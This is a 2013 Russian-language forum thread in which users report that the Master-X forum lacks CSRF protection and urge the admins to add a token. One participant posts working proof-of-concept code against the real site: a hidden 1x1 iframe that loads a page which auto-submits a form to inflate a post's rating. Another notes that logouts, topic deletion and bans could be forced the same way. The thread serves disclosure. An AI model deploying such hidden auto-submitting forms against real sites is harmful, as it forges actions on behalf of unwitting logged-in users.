Master-X
Форум | Новости | Статьи
Главная » Форум » О сайте, Тестовые постинги, Баги » 
Тема: CSRF
цитата
10/09/13 в 14:19
 Dr. Kronos
Уважаемые, надо бы простейшую защиту от этой фигни сделать. Токен какой-нибудь приделать. smail54.gif
Вот так элементарно можно разлогинить всех просмотревших этот пост

Нажмите F5. trollface.png
Таким же образом можно удалять топики, банить юзеров и т.п.
цитата
10/09/13 в 16:29
 JM
сильно
цитата
10/09/13 в 17:00
 ibiz
печаль беда facepalm.gif
цитата
10/09/13 в 17:07
 Dr. Kronos
Не говори facepalm.gif
цитата
10/09/13 в 17:19
 ibiz
тоже продемонстрирую, как можно накрутить рейтинг через некоторые браузеры:

подсовываем залогиненному пользователю фрейм:
Код:

<iframe src="http://localhost/submitpost.php" width="1" height="1">
<p>Your browser does not support iframes.</p>
</iframe>


submitpost.php:
Код:

<form id="subm" action="https://www.master-x.com/forum/topics/172237/" method="post" />
<input type="text" name="rate_value" value="1" />
<input type="text" name="rate_post" value="2511993" />
<input type="submit" />
</form>
<script>frm = document.getElementById("subm");frm.submit();</script>


Эта страница в полной версии